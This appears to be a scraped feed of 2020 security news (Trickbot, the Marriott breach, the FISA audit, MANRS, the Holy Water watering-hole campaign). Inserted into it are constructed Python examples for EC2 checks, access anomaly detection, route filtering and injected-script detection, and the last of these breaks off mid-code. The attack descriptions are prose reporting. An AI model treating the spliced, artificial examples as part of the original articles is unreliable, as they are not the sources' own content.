Trickbot: A primer

In recent years, the modular banking trojan known as Trickbot has evolved to become one of the most advanced trojans in the threat landscape. It has gone through a diverse set of changes since it was first discovered in 2016, including adding features that focus on Windows 10 and modules that target point of sale (POS) systems. Not only does it function as a standalone trojan, Trickbot is also commonly used as a dropper for other malware such as the Ryuk ransomware. The wide range of functionality allows this malware to adapt to different environments and maximize effectiveness in a compromised network.

The post Trickbot: A primer appeared first on Cisco Blogs.

Phishing Campaigns Leverage Latest COVID-19 Themes

Researchers Issue Warnings After Malicious Messages Tied to Economic Stimulus Plans Surface
With the U.S. and other nations adopting economic stimulus packages as a result of the global COVID-19 pandemic, fraudsters are now using the promise of government checks as phishing lures to spread banking Trojans, according to a pair of new security research reports.

Marriott discloses data breach impacting up to 5.2 Million guests

Marriott disclosed a new security breach detected at the end of February 2020 that could impact up to 5.2 million of its guests.

Marriott International has disclosed a data breach that exposed the personal information of roughly 5.2 million hotel guests; the incident was detected at the end of February 2020.

“At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property. We believe this activity started in mid-January 2020.” reads the data breach notification published by the company. “Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests.”

The following information may have been involved:

  • Contact Details (e.g., name, mailing address, email address, and phone number)
  • Loyalty Account Information (e.g., account number and points balance, but not passwords)
  • Additional Personal Details (e.g., company, gender, and birthday day and month)
  • Partnerships and Affiliations (e.g., linked airline loyalty programs and numbers)
  • Preferences (e.g., stay/room preferences and language preference)

The investigation is still ongoing; at the time of writing, Marriott confirmed that it is not aware of any exposure of information such as Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers.

Guests could check whether they have been impacted by the security breach by visiting the online portal set up by the company.

The company also disabled the passwords of the Marriott Bonvoy members affected by the incident and forced a reset; it is also prompting them to enable multi-factor authentication.

Marriott is notifying affected individuals and it is offering them free identity protection services for one year.

In November 2018, the company announced that hackers had compromised the guest reservation database at its Starwood hotels subsidiary and stolen the personal details of about 500 million guests.

Pierluigi Paganini

(SecurityAffairs – Marriott, hacking)

The post Marriott discloses data breach impacting up to 5.2 Million guests appeared first on Security Affairs.

OIG Lacks Confidence in FBI’s Adherence to Woods Procedures

The Office of the Inspector General (OIG) has said it lacks confidence that the Federal Bureau of Investigation is executing its Woods Procedures in line with FBI policy when applying for court permission to surveil people in the United States. 

The FBI implemented its Woods Procedures in 2001 following errors in numerous Foreign Intelligence Surveillance Act (FISA) applications submitted to the Foreign Intelligence Surveillance Court (FISC) in FBI counterterrorism investigations. The procedures, named for FBI agent Michael Woods, who helped devise them, require that every fact submitted in support of a wiretap application must be verified.

FBI policy requires case agents who will be requesting the FISA application to create and maintain a "Woods File" that contains supporting documentation for every factual assertion contained in the application together with the results of required database searches and other verifications.

A report published by the OIG on March 30 states that a recent audit of the FBI found that, in some FISA applications, Woods Files had gone missing or may never have existed.

Over the past two months, auditors visited 8 FBI field offices and reviewed a judgmentally selected sample of 29 applications relating to US persons and involving both counterintelligence and counterterrorism investigations. 

The OIG report states that "we could not review original Woods Files for 4 of the 29 selected FISA applications because the FBI has not been able to locate them and, in 3 of these instances, did not know if they ever existed." 

In all 25 of the FISA applications the OIG was able to review, auditors identified errors or inadequately supported facts.

The OIG said: "For all 25 FISA applications with Woods Files that we have reviewed to date, we identified facts stated in the FISA application that were: (a) not supported by any documentation in the Woods File, (b) not clearly corroborated by the supporting documentation in the Woods File, or (c) inconsistent with the supporting documentation in the Woods File."

The auditors' findings led the OIG to conclude that the FBI's FISA applications were not as accurate as they should be.

"We believe that a deficiency in the FBI’s efforts to support the factual statements in FISA applications through its Woods Procedures undermines the FBI’s ability to achieve its 'scrupulously accurate' standard for FISA applications," stated the OIG.

The AWS Service to Focus On – Amazon EC2

If we ran a contest for Mr. Popular of Amazon Web Services (AWS), without a doubt Amazon Simple Storage Service (S3) would have ‘winner’ written all over it. However, what’s popular is not always what is critical for your business to focus on. There is popularity and then there is dependability. Let’s acknowledge how reliant we are on Amazon Elastic Compute Cloud (EC2) as AWS infrastructure-led organizations.

We reflected upon our in-house findings for the AWS ‘Security’ pillar in our last blog, Four Reasons Your Cloud Security is Keeping You Up at Night, explicitly leaving out over-caffeination and excessive screen time!

Drilling further down to the most affected AWS services, Amazon EC2-related issues topped the list with 32% of all issues, whereas Mr. Popular, Amazon S3, contributed 12%. While cloud providers like AWS offer a secure infrastructure and best practices, many customers are unaware of their role in the shared responsibility model. The number of issues impacting Amazon EC2 customers demonstrates the security gap that opens up when the customer’s part of the shared responsibility model is not well understood.

While these AWS services and infrastructure are secure, customers also have a responsibility to secure their data and to configure environments according to AWS best practices. So how do we ensure that we keep our focus on this crucial service and ensure the flexibility, scalability, and security of a growing infrastructure?

Introducing Rules

If you thought you were done with rules after passing high school and moving out of your parents’ house, you soon realized that you were living a dream. Rules seem to be everywhere! Rules are important: they keep us safe and secure. While some may still say ‘rules are made to be broken’, you will go into a slump if your cloud infrastructure breaks the rules of the industry and gets exposed to security vulnerabilities.

It is great if you are already following the Best Practices for Amazon EC2, but if not, how do you monitor the performance of your services day in and day out to ensure their adherence to these best practices? How can you track if all your services and resources are running as per the recommended standards?

We’re here to help with that. Trend Micro Cloud One – Conformity ‘Rules’ provide you with that visibility for some of the most critical services like Amazon EC2.

What is the Rule?

A ‘Rule’ is the definition of a best practice used as the basis for an assessment that Conformity runs on a particular piece of your cloud infrastructure. When a rule is run against the infrastructure (resources) associated with your AWS account, the result of the scan is referred to as a Check. For example, your Amazon EC2 resources may be scanned by 60 Rules (Checks) for various risks and vulnerabilities. Each Check is either a SUCCESS or a FAILURE.

Conformity has about 540 Rules, 60 of which monitor Amazon EC2 best practices. The Conformity Bot scans your cloud accounts against these Rules and presents you with the ‘Checks’ so you can prioritize and remediate issues, keeping your services healthy and preventing security breaches.

Amazon EC2 Best Practices and Rules

Here are just a few examples of how Conformity Rules have got you covered for some of the most critical Amazon EC2 best practices:

  1. For Security, use IAM users and roles and establish management policies for access.
  2. For managing Storage, keep separate EBS volumes for operating systems and data, and check that Amazon EC2 instances provisioned outside of AWS Auto Scaling Groups (ASGs) have the Termination Protection safety feature enabled, so they cannot be terminated accidentally.
  3. For efficient Resource Management, use custom tags to track and identify resources, and keep on top of your stated Amazon EC2 limits.
  4. For confident Backup and Recovery, regularly test the process of recovering instances and EBS volumes should they fail, and create and use approved AMIs for easier and more consistent future instance deployment.
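The following is an added example, not Trend Micro's or Conformity's code, of what two of the Checks listed above look like when written out: a termination-protection rule that applies only to instances outside an Auto Scaling Group, and a required-tags rule. Rule names, the tagging policy, and the instance records are constructed; `fetch_instances_boto3()` shows how the same record shape would be filled from the real `describe_instances` and `describe_instance_attribute` calls, and is not exercised by the offline run.

```python
"""
Conformity-style EC2 checks for two of the best practices listed above:
termination protection on instances outside an Auto Scaling Group, and
required resource tags. Added example: this is not Trend Micro's code.
The instance records below are constructed; fetch_instances_boto3() shows
how the same shape would be filled from the real EC2 API.
"""
from typing import Callable, Dict, List, Tuple

# Constructed instance records in the shape produced by normalize_instance().
SAMPLE_INSTANCES = [
    {"InstanceId": "i-0a11standalone", "DisableApiTermination": False,
     "Tags": {"Name": "web-1", "Owner": "platform"}},
    {"InstanceId": "i-0b22inasg", "DisableApiTermination": False,
     "Tags": {"Name": "api-3", "Owner": "platform",
              "aws:autoscaling:groupName": "api-asg"}},
    {"InstanceId": "i-0c33protected", "DisableApiTermination": True,
     "Tags": {"Name": "db-1"}},
]

REQUIRED_TAGS = ("Name", "Owner")  # constructed tagging policy

Check = Tuple[str, str]  # (status, reason) with status SUCCESS or FAILURE


def check_termination_protection(inst: Dict) -> Check:
    """Instances not managed by an ASG should have termination protection on."""
    if "aws:autoscaling:groupName" in inst["Tags"]:
        # EC2 adds this tag to ASG-launched instances; the ASG must be able to
        # terminate them, so the rule does not apply.
        return ("SUCCESS", "managed by Auto Scaling Group")
    if inst["DisableApiTermination"]:
        return ("SUCCESS", "termination protection enabled")
    return ("FAILURE", "standalone instance without termination protection")


def check_required_tags(inst: Dict) -> Check:
    """Every instance should carry the tags the tagging policy requires."""
    missing = [t for t in REQUIRED_TAGS if t not in inst["Tags"]]
    if missing:
        return ("FAILURE", "missing tags: " + ", ".join(missing))
    return ("SUCCESS", "all required tags present")


RULES: Dict[str, Callable[[Dict], Check]] = {
    "EC2-TerminationProtection": check_termination_protection,
    "EC2-RequiredTags": check_required_tags,
}


def run_checks(instances: List[Dict], rules=RULES) -> List[Tuple[str, str, str, str]]:
    """Run every rule against every instance; one Check per (rule, resource)."""
    results = []
    for inst in instances:
        for rule_id, fn in rules.items():
            status, reason = fn(inst)
            results.append((rule_id, inst["InstanceId"], status, reason))
    return results


def failures(results) -> List[Tuple[str, str, str, str]]:
    """Only the Checks that need remediation."""
    return [r for r in results if r[2] == "FAILURE"]


def normalize_instance(raw: Dict, disable_api_termination: bool) -> Dict:
    """Flatten a describe_instances entry into the record shape used above."""
    return {
        "InstanceId": raw["InstanceId"],
        "DisableApiTermination": disable_api_termination,
        "Tags": {t["Key"]: t["Value"] for t in raw.get("Tags", [])},
    }


def fetch_instances_boto3(region: str = "us-east-1") -> List[Dict]:
    """Live variant: needs boto3 and AWS credentials; not used by the demo."""
    import boto3  # imported lazily so the offline demo has no dependency
    ec2 = boto3.client("ec2", region_name=region)
    out = []
    for page in ec2.get_paginator("describe_instances").paginate():
        for res in page["Reservations"]:
            for raw in res["Instances"]:
                attr = ec2.describe_instance_attribute(
                    InstanceId=raw["InstanceId"], Attribute="disableApiTermination")
                out.append(normalize_instance(raw, attr["DisableApiTermination"]["Value"]))
    return out


if __name__ == "__main__":
    for rule_id, iid, status, reason in run_checks(SAMPLE_INSTANCES):
        print(f"{status:8} {rule_id:28} {iid:18} {reason}")
```

Run against the constructed records, the standalone unprotected instance fails the termination-protection Check and the instance missing an Owner tag fails the tagging Check; the ASG-managed instance passes the first rule because an ASG must remain able to replace its members.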

See how Trend Micro can support your part of the shared responsibility model for cloud security: https://www.trendmicro.com/cloudconformity.

Stay Safe!

The post The AWS Service to Focus On – Amazon EC2 appeared first on .

Marriott Hotel chain hit by hackers – again

Sixteen months after acknowledging a huge data breach, Marriott Hotels says it has been stung again, this time after the login credentials of two employees were used.

The chain said this morning that it has begun notifying some 5.2 million guests who stayed at its hotels in several countries, including Canada, the U.S. and the United Kingdom, that they were victims of the breach.

Stolen personal information includes names, addresses, email addresses and birthdates. At the moment, the company doesn’t think payment card information, passport numbers, national IDs or driver’s licences were copied.

In a statement, the chain said that the hackers accessed an application used to help provide services to guests at hotels. At the end of February, it realized an unexpected amount of guest information might have been accessed using the login credentials of two employees at a franchised Marriott hotel. “We believe this activity started in mid-January 2020. Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests.”

At this point Marriott says it thinks the following information may have been involved in the breach, although not all of it was copied for every guest:

  • Contact Details (e.g., name, mailing address, email address, and phone number)
  • Loyalty Account Information (e.g., account number and points balance, but not passwords)
  • Additional Personal Details (e.g., company, gender, and birthday day and month)
  • Partnerships and Affiliations (e.g., linked airline loyalty programs and numbers)
  • Preferences (e.g., stay/room preferences and language preference)

In November 2018 Marriott admitted that it had been victimized by a hack of the computer system of the company’s Starwood chain (which included W Hotels, St. Regis, Sheraton Hotels & Resorts, Westin Hotels & Resorts, Element Hotels, Aloft Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, Four Points by Sheraton and Design Hotels), which Marriott had bought several years before. Approximately 383 million records of those who stayed or made reservations at Starwood properties were involved, but that includes multiple records for the same guest.

Approximately 8.6 million encrypted payment cards were copied over four years in that breach. Of those, the vast majority had expired by September 2018, when the breach was discovered. Approximately 354,000 cards were unexpired as of September 2018. But the theft also involved some 5.25 million unencrypted passport numbers, as well as roughly 20.3 million encrypted passport numbers.

Consumers should note that Marriott is sending notification messages from marriott@email-marriott.com. Messages from other accounts should be treated as fraudulent. It is common for hackers to try to take advantage of data breach announcements by sending fake messages with malicious links to infect computers. Where available, Marriott is offering victims the option to enroll in a personal information monitoring service free of charge for one year.

Tim Erlin, Tripwire’s vice-president of product management and strategy, noted that while the Marriott release had a lot of information for consumers, it offers little for security practitioners to better understand how to avoid similar incidents. “Breaches that use valid credentials can be harder to detect because the attack looks like a valid login,” he added. “In these cases, organizations often have to look at what changes that attacker is making as they carry out their objective in order to detect the malicious activity.”
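One concrete way to act on the detection problem described above, where valid credentials are used to pull "an unexpected amount" of guest data, is to baseline how many distinct records each account normally touches per day and alert on days that break the baseline. The example below is added here and is not Marriott's or Tripwire's code; the log format, account names, thresholds and every count are constructed.

```python
"""
Per-account baseline of guest records viewed per day, flagging days that exceed it.
Added example for the detection problem Tim Erlin describes above; not Marriott's
or Tripwire's code. The log format, account names, and all counts are constructed.
"""
from collections import defaultdict
import statistics
from typing import Dict, List, Tuple

BASELINE_DAYS = [f"2020-01-{d:02d}" for d in range(10, 17)]   # seven "normal" days
EVAL_DAY = "2020-01-17"                                        # day under review

# Constructed daily record-view counts per account: seven baseline days, then the
# day under review, where agent02's credentials pull far more records than usual.
_PROFILE = {
    "agent01": ([22, 25, 19, 27, 24, 21, 26], 25),
    "agent02": ([18, 23, 20, 25, 22, 19, 24], 400),
}


def build_sample_log() -> List[str]:
    """Emit constructed log lines: '<ISO timestamp> <account> VIEW_GUEST <record id>'."""
    lines = []
    for account, (baseline, eval_count) in _PROFILE.items():
        for day, n in zip(BASELINE_DAYS + [EVAL_DAY], baseline + [eval_count]):
            for i in range(n):
                lines.append(f"{day}T09:{i // 60:02d}:{i % 60:02d}Z {account} "
                             f"VIEW_GUEST G{day[-2:]}{i:04d}")
    return lines


def parse_line(line: str) -> Dict[str, str]:
    """Split one constructed log line into its fields."""
    ts, account, action, record = line.split()
    return {"day": ts[:10], "account": account, "action": action, "record": record}


def daily_record_counts(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """account -> day -> number of distinct guest records viewed."""
    seen = defaultdict(lambda: defaultdict(set))
    for line in lines:
        e = parse_line(line)
        if e["action"] == "VIEW_GUEST":
            seen[e["account"]][e["day"]].add(e["record"])
    return {a: {d: len(r) for d, r in days.items()} for a, days in seen.items()}


def flag_excessive_access(counts, baseline_days=BASELINE_DAYS,
                          min_records: int = 50, sigma: float = 3.0
                          ) -> List[Tuple[str, str, int, float]]:
    """
    Alert when a non-baseline day exceeds max(min_records, mean + sigma*stdev)
    of that account's own baseline days. min_records stops a very quiet account
    from alerting on ordinary fluctuation.
    """
    alerts = []
    for account, by_day in counts.items():
        base = [by_day.get(d, 0) for d in baseline_days]
        threshold = max(min_records,
                        statistics.fmean(base) + sigma * statistics.pstdev(base))
        for day in sorted(by_day):
            if day not in baseline_days and by_day[day] > threshold:
                alerts.append((account, day, by_day[day], round(threshold, 1)))
    return alerts


if __name__ == "__main__":
    for a in flag_excessive_access(daily_record_counts(build_sample_log())):
        print("ALERT account=%s day=%s records=%d threshold=%.1f" % a)
```

A volume baseline of this kind surfaces bulk collection through a legitimate account but will not catch an attacker who stays under the per-day norm, so it belongs alongside the change-oriented monitoring mentioned above rather than replacing it.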

Making it easier for your remote workforce to securely access all the apps they need, from anywhere

Since I published my last blog, Five identity priorities for 2020, COVID-19 has upended the way we work and socialize. Now that physical distancing has become essential to protect everyone’s health, more people than ever are going online to connect and get things done. As we all adjust to a new daily routine, the organizations we work for are turning to technology to help us collaborate and stay productive. In these challenging times, identity can make life simpler, both for people working from home and for IT administrators charged with keeping their environments secure.

In my previous blog, I advised connecting all applications and cloud resources to Azure Active Directory (Azure AD). If you’re like most organizations, your employees use a lot of apps, from popular software-as-a-service (SaaS) apps—including collaboration services like Zoom, Cisco Webex, Workplace from Facebook, or Box—to legacy web and on-premises applications. Making Azure AD the control plane across all your apps helps ensure your employees working from home have secure, seamless access to the tools and resources they need, while protecting those tools and resources from unauthorized access.

Making it easy for remote workers to access the apps they need

When you connect your apps to Azure AD, your employees only need to sign in once to access them, and they only need one set of credentials. To make on-premises web apps available without a cumbersome VPN, you can use Azure AD Application Proxy, while tools from our secure hybrid access partners like can provide access to. To get productive from wherever they are, your employees simply go to the My App Portal, where they can find all the apps they have your permission to use.

Screenshot showing apps in the My Apps portal.

Figure 1: Users can sign in once and access all the apps they need in a central place, the My Apps portal.

Enabling consistent, strong security across all your apps

With Azure AD, enabling productivity doesn’t shortchange security. Once you’ve connected your apps to Azure AD, you can apply custom security policies across your entire digital estate. Since even complex passwords get stolen, we recommend enforcing multi-factor authentication (MFA) for all accounts and applying Conditional Access policies for adaptive granular access controls. For example, when a user signs in, policies can determine whether to allow, limit, or block access based on their location, whether their device is compliant, and which app they’re trying to access.

Additionally, Microsoft Intune App Protection Policies can provide application-level controls and compliance, while maintaining a great user experience on any device. Intune app configuration policies can help keep work data safe by controlling or stopping people from sharing work data outside of trusted apps assigned to them.

Increasing IT efficiency with self-service and automation​

To reduce the burden on IT, Azure AD offers several tools to simplify management. Self-Service Password Reset lets users manage passwords on their own. Pre-integrated applications make it easy to enable single sign-on (SSO) with just a few clicks (Figure 2). Some companies, to help serve their communities. Automated provisioning of user accounts and apps makes onboarding significantly faster, so those new workers can get productive right away. For one customer, Mattress Firm, adding a new employee to their HR system automatically provisions their Azure AD user account and assigns them access to the appropriate applications within four hours.

Screenshot showing apps in the Azure AD Gallery.

Figure 2: Configure your apps for secure, seamless access with just a couple clicks.

Get free assistance connecting your apps to Azure AD

Many of our customers are moving rapidly to enable secure remote work during this current crisis, and we want to make sure you have everything you need. If you have subscriptions to Office 365 or Azure, you can use Azure AD to configure secure SSO for your 10 most critical apps for free. A license for Microsoft 365 gives you full access to Azure AD. For all our customers, we also offer complimentary deployment assistance through our FastTrack program.

As unprecedented numbers of people work remotely, the right tools, including Azure AD, can help keep them both protected and productive. Whatever your circumstances, we’re here to help. You can reach us via Twitter: @AzureAD.

Learn more

Learn how to use Azure AD to connect your workforce to all the apps they need from anywhere.

*This offer includes MFA via the Microsoft Authenticator app only.

The post Making it easier for your remote workforce to securely access all the apps they need, from anywhere appeared first on Microsoft Security.

MariaDB SkySQL: Deploy production databases for mission-critical applications running in the cloud

MariaDB announced the immediate availability of MariaDB SkySQL, the first database-as-a-service (DBaaS) to unlock the full power of MariaDB Platform for transactions, analytics or both, and optimized with a cloud-native architecture. SkySQL delivers the “MariaDB in the cloud” experience customers have been waiting for – fully featured, fully customizable and backed by world-class support and database expertise from the source, the engineers who built it. “The universal need for accessible yet robust database services has … More

The post MariaDB SkySQL: Deploy production databases for mission-critical applications running in the cloud appeared first on Help Net Security.

Marriott Suffers Second Breach Exposing Data of 5.2 Million Hotel Guests

International hotel chain Marriott today disclosed a data breach impacting nearly 5.2 million hotel guests, making it the second security incident to hit the company in recent years. "At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property," Marriott said in a

Content delivery networks, cloud providers can now join routing security group

Google, Facebook, Microsoft, Netflix and Cloudflare are among the big-name companies that have joined an industry-led initiative to reduce the ability of threat actors to abuse the internet’s global routing system for cyber attacks.

The Internet Society said today that those providers and others have agreed to follow the Mutually Agreed Norms For Routing Security (MANRS) after content delivery networks (CDNs) and cloud providers were allowed to join. Until now MANRS was limited to network operators and internet exchange points.

Briefly, MANRS members agree to shore up the security of routing and signalling so threat actors can’t manipulate the ways traffic is routed and launch threats such as distributed denial of service attacks.

Related:

MANRS releases tool to help with compliance

Content delivery networks and cloud providers don’t exchange packets with other networks, said Andrei Robachevsky, senior technology program manager at the Internet Society. But, he added, “they connect with a lot of networks on the internet. Everyone wants to peer with a cloud network or a CDN. So the idea is can we leverage their peering power and facilitate some of the improvements in the routing system.

“Big content and cloud providers usually have thousands of networks connecting to them. If they only encourage hygiene and raise awareness of routing security issues among thousands of networks we can’t reach, to actually put filters in place preventing them from emitting incorrect routing information, we expect it will have a big effect.”

MANRS was founded in late 2014 and counts 275 network operators and 45 internet exchange points as members. Canada’s biggest network providers — Bell, Rogers and Telus — have yet to join. U.S. providers who are members include Comcast, a huge cable provider, but not AT&T or Verizon.

Canadian members include the Canarie national university research network, Alberta’s Cybera research network and Quebec’s RISQ network, as well as internet exchange providers TorIX (Toronto), YYCIX (Calgary), YXEIX (Saskatoon), and QIX (Montreal).

Related:

Canadian IXPs join MANRS

In January the World Economic Forum issued a report urging internet service providers to join MANRS.

There are at least 60,000 independent networks that make up the internet. They exchange what is called reachability information among themselves using the Border Gateway Protocol (BGP) standard. Each network builds its own “map” or routing table of the internet, which it uses to decide where to forward packets. However, the routing databases held by operators aren’t always accurate. That can cause networks to be hijacked, in addition to service outages.

The Internet Society estimated that in 2017 there were 14,000 routing outages or incidents, including hijacking, leaks, spoofing and large-scale Denial of Service (DoS) attacks.

The MANRS rules encourage members to help prevent the spread of incorrect routing information by filtering announcements in their route servers.

Content delivery networks and cloud providers that sign up agree to follow six actions to improve the resilience and security of the routing infrastructure:

  • Prevent propagation of incorrect routing information
  • Prevent traffic of illegitimate source IP addresses
  • Facilitate global operational communication and co-ordination
  • Facilitate validation of routing information on a global scale
  • Encourage MANRS adoption
  • Provide monitoring and debugging tools to peering partners (optional)
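The first two MANRS actions above, filtering incorrect routing information and blocking illegitimate source addresses, come down to two checks at the edge of a network. The following added example (not Internet Society or MANRS code) implements both in miniature: a route announcement is accepted only if it is not bogon space, is no more specific than /24, and is covered by a registered route for an origin inside the peer's customer cone, in the spirit of IRR route objects and RPKI ROAs; and a packet's source address is accepted only if it falls in space registered to that cone, in the spirit of BCP 38. The ASNs (private-use range), prefixes (RFC 5737 documentation space) and customer cone are all constructed.

```python
"""
Ingress filtering of the kind MANRS asks for: reject route announcements that a
peer is not entitled to originate, and drop packets whose source address a peer
could not legitimately send. Added example; not Internet Society or MANRS code.
The ASNs, prefixes, and customer cone below are constructed (private-use ASNs,
RFC 5737 documentation prefixes).
"""
import ipaddress
from typing import Dict, Set, Tuple

# Constructed registry, in the spirit of IRR route objects / RPKI ROAs:
# origin ASN -> {prefix: maximum announced length}.
REGISTRY: Dict[str, Dict[str, int]] = {
    "AS64500": {"203.0.113.0/24": 24},
    "AS64496": {"198.51.100.0/24": 24},
}

# Constructed customer cone: which origins a peer may announce to us.
CUSTOMER_CONE: Dict[str, Set[str]] = {
    "AS64500": {"AS64500", "AS64496"},
}

# Martian / bogon space that should never appear in a route announcement.
# The RFC 5737 documentation prefixes are deliberately left out of this list
# because the constructed registry above uses them as "real" customer space.
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "198.18.0.0/15", "224.0.0.0/3",
)]
MAX_PREFIX_LEN = 24   # anything more specific is not globally routable


def validate_announcement(peer: str, prefix: str, origin: str) -> Tuple[bool, str]:
    """Decide whether to accept `prefix` announced by `peer` with origin `origin`."""
    try:
        net = ipaddress.ip_network(prefix, strict=True)
    except ValueError as e:
        return False, f"malformed prefix: {e}"
    if any(net.version == b.version and net.subnet_of(b) for b in BOGONS):
        return False, "bogon prefix"
    if net.prefixlen > MAX_PREFIX_LEN:
        return False, f"more specific than /{MAX_PREFIX_LEN}"
    if origin not in CUSTOMER_CONE.get(peer, set()):
        return False, f"{origin} is not in {peer}'s customer cone"
    for registered, max_len in REGISTRY.get(origin, {}).items():
        reg = ipaddress.ip_network(registered)
        if reg.version == net.version and net.subnet_of(reg) and net.prefixlen <= max_len:
            return True, f"covered by {registered} (max /{max_len})"
    return False, f"no registered route for {prefix} with origin {origin}"


def is_legitimate_source(peer: str, src_ip: str) -> bool:
    """BCP 38 style check: the source must lie in space registered to the peer's cone."""
    addr = ipaddress.ip_address(src_ip)
    for origin in CUSTOMER_CONE.get(peer, set()):
        for registered in REGISTRY.get(origin, {}):
            if addr in ipaddress.ip_network(registered):
                return True
    return False


if __name__ == "__main__":
    for args in [("AS64500", "203.0.113.0/24", "AS64500"),
                 ("AS64500", "203.0.113.0/25", "AS64500"),
                 ("AS64500", "10.0.0.0/8", "AS64500"),
                 ("AS64500", "198.51.100.0/24", "AS64511")]:
        print(args, validate_announcement(*args))
    print("203.0.113.77 from AS64500:", is_legitimate_source("AS64500", "203.0.113.77"))
```

In production the registry would be populated from IRR data or RPKI-validated ROAs rather than a hand-written dictionary, and the filters would be compiled into router prefix-lists; the decision logic is the same.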

Phishing Campaigns Leverage New COVID-19 Themes

Researchers Issue Warnings After Malicious Messages Tied to Economic Stimulus Plans Surface
With the U.S. and other nations adopting economic stimulus packages as a result of the global COVID-19 pandemic, fraudsters are now using the promise of government checks as phishing lures to spread banking Trojans, according to a pair of new security research reports.

Marriott International confirms data breach of up to 5.2 million guests

Marriott International has today announced that it has suffered a data breach affecting up to 5.2 million people. The hotel chain says it uses an application to help provide services to its guests. Beginning mid-January this year, the login credentials of two employees at a franchised property were used to access guest information on this […]

New Marriott Data Breach Affects 5.2 Million Guests

Hotel chain Marriott International announced today that it has suffered a second data breach.

According to an incident notification published on their website, the company spotted unusual activity occurring in an app that guests use to access services during their stay. 

An investigation into the activity revealed that the login credentials of two Marriott employees had been used to access "an unexpected amount" of guest information.

Marriott said guest data that may have been compromised in the breach included contact details, loyalty account information, personal details such as birth dates, and information concerning linked partnerships and affiliations like airline loyalty programs. 

Precisely what information was accessed varied from guest to guest, but in some cases email addresses, phone numbers, and employer details were exposed. 

Marriott said: "At the end of February 2020, we identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property. We believe this activity started in mid-January 2020."

While the investigation into the data breach is ongoing, Marriott said that "we currently have no reason to believe that the information involved included Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers."

On March 31, 2020, Marriott sent emails about the incident to guests involved. The hotel chain has offered guests affected by the incident a year's worth of personal information monitoring from IdentityWorks free of charge. 

Marriott said: "We have also set up a self-service online portal for guests to be able to determine whether their information was involved in the incident and, if so, what categories of information were involved." 

This latest data breach has affected approximately 5.2 million Marriott guests. The hotel chain has advised Marriott Bonvoy account holders to change account passwords and to monitor their accounts for suspicious activity.

In November 2018, Marriott reported a data breach that saw the records of approximately 339 million guests exposed. In a catastrophic and ongoing cybersecurity incident, threat actors were found to have had unauthorized access to the hotel's Starwood network since 2014.  

Holy water targets religious figures and charities in Asia

Holy Water – An APT group compromised a server hosting Web pages belonging mainly to religious figures and charities to carry out watering hole attacks.

On December 4, 2019, Kaspersky experts discovered a watering hole attack, tracked as Holy Water, aimed at an Asian religious and ethnic group. The campaign has been active since at least May 2019 and delivered fake Adobe Flash update warnings to its victims.

The experts believe the threat actors have been evolving their tooling: they were observed employing Sojson obfuscation, the NSIS installer, Python, open-source code, GitHub distribution, the Go language, and Google Drive-based C2 channels in their campaigns.

At the time of writing, the real target of the attacks is still unclear.

“The watering holes have been set-up on websites that belong to personalities, public bodies, charities and organizations of the targeted group. At the time of writing, some of these websites (all hosted on the same server) are still compromised, and continue to direct selected visitors to malicious payloads.” reads the analysis published by Kaspersky Lab.

When a user visits one of the watering hole websites, a compromised embedded resource loads a malicious JavaScript hosted on one of the water-holed websites, which gathers information on the visitor and determines whether they are a target.

If the visitor is a potential target, the attack chain starts: the JavaScript loads a second script that triggers the drive-by download attack, showing the victim a fake update pop-up.

The visitor is then tricked into installing the fake update that hides a malicious installer package that will set up a backdoor.

The analysis of the JavaScript involved in the attack suggests that the attackers might also target macOS users.

The attackers used GitHub as the repository for the malicious executables employed in the attacks; GitHub disabled the repository on February 14 after Kaspersky reported it.

The repository had been online for more than nine months, and GitHub provided its commit history, giving the experts a unique insight into the attackers’ activity and tools.

Experts found four executables hosted in the repository: an installer package embedding a decoy legitimate Flash update and a stager; the Godlike12 Go backdoor, which implements a Google Drive-based C2 channel; and two versions of the open-source Stitch Python backdoor that the attackers had customized.

“Digging into the repository for older commits, we also discovered a previous fake update toolset: a C installer bundling the legitimate Flash installer and a vanilla Stitch backdoor, as well as a C++ infostealer that collects information about host computers (OS version, IP address, hostname) and sends them over HTTP/S.” continues Kaspersky.

Experts noticed that the attackers used a low-budget toolset but spent significant effort evolving it.

“With almost 10 compromised websites and dozens of implanted hosts (that we know of), the attackers have set up a sizable yet very targeted water-holing attack. The toolset that’s being used seems low-budget and not fully developed, but has been modified several times in a few months to leverage interesting features like Google Drive C2, and would be characteristic of a small, agile team.” concludes Kaspersky.

“We were unable to observe any live operations, but some tracks indicate that the Godlike12 backdoor is not widespread, and is probably used to conduct reconnaissance and data-exfiltration operations. We were unable to correlate these attacks to any known APT groups.”
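From the site owner's side, the first stage of the chain described above (a compromised page that starts loading a script it never loaded before) is detectable by comparing the scripts a served page references against a known-good copy. The following is an added example, not Kaspersky's code: it records every external script `src` and a hash of every inline script body from a baseline copy of a page, then reports any reference or inline body that is absent from that baseline. Both HTML snippets are constructed; the paths in them are placeholders.

```python
"""
Site-owner check for the injection Kaspersky describes: a compromised page loading
a script it did not load before. Compares the scripts a served page references
against a known-good baseline. Added example; not Kaspersky's code. The HTML
snippets are constructed.
"""
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple

# Constructed known-good copy of a page.
BASELINE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script>window.siteReady = true;</script>
</head><body><p>Welcome</p></body></html>"""

# Constructed later copy of the same page with an extra script reference and a
# changed inline script, the two signs of tampering this check looks for.
CURRENT_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="/js/stats.js"></script>
<script>window.siteReady = true; window.visitorProfile = {};</script>
</head><body><p>Welcome</p></body></html>"""


class ScriptCollector(HTMLParser):
    """Collects external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_inline = False
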